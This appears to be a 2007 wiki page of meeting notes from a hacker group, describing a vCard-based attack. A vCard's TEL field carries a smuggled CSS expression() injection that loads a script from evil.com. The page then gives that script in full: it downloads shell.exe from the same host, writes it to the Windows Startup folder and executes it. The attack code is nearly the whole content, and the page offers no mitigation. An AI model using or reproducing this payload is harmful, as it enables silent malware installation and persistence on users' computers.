2007 08 29 0x000b GAMMAH Notes

So here's the details on it:

The vcard looks like this:
BEGIN:VCARD
VERSION:3.0
FN:Inspector Gadget
TEL;type=HOME:' style='c:expression(document.all[document.all.length-1].src="http://evil.com/file.js")
END:VCARD

The contents of file.js:
var url="http://evil.com/shell.exe";
var path=System.Environment.getEnvironmentVariable("APPDATA") + "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\shell.exe";
var x = new XMLHttpRequest();
x.open("GET", url, true);
x.send();
var a = new ActiveXObject("ADODB.Stream");
a.Type = 1;
a.Open();
a.Write(x.responseBody);
a.SaveToFile(path, 2);
a.Close;
a = null;
System.Shell.execute(path);

This saves shell.exe to the user's startup folder, then runs it.

page revision: 0, last edited: 30 Aug 2007 06:24

Edit Tags History Files Print Site tools + Options

Click here to edit contents of this page.

Click here to toggle editing of individual sections of the page (if possible). Watch headings for an "edit" link when available.

Append content without editing the whole page source.

Check out how this page has evolved in the past.

If you want to discuss contents of this page - this is the easiest way to do it.

View and manage file attachments for this page.

A few useful tools to manage this Site.

See pages that link to and include this page.

Change the name (also URL address, possibly the category) of the page.

View wiki source for this page without editing.

View/set parent page (used for creating breadcrumbs and structured layout).

Notify administrators if there is objectionable content in this page.

Something does not work as expected? Find out what you can do.

General Wikidot.com documentation and help section.

Wikidot.com Terms of Service - what you can, what you should not etc.

Wikidot.com Privacy Policy.

AHA!

Austin Hackers Association

Other interesting sites

SCP基金會中文沙盒站

Liminal Archives

Zagłębiowska Masa Krytyczna

Margopedia